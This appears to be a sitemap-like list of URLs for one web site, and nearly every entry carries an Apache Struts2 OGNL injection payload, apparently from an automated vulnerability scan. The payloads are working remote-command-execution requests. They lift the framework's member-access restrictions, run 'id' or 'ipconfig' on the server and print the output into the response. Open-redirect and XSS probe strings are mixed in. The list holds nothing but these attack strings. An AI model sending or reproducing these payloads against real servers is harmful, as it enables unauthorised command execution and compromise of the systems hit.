http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm51277%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem36583?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/osm33453%e8%b0%b0o1%e5%85%b0o2a%e6%81%87coem13287?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?xsstest 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?=%2578%2573%2573%2574%2565%2573%2574%2531%2530%2539 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f=%2578%2573%2573%2574%2565%2573%2574%2531%2530%2539? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?&redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?$%7b100002-1%2b'anonymous_'%2b'security_s2015_test'%7d.action 0.5 2024-04-15 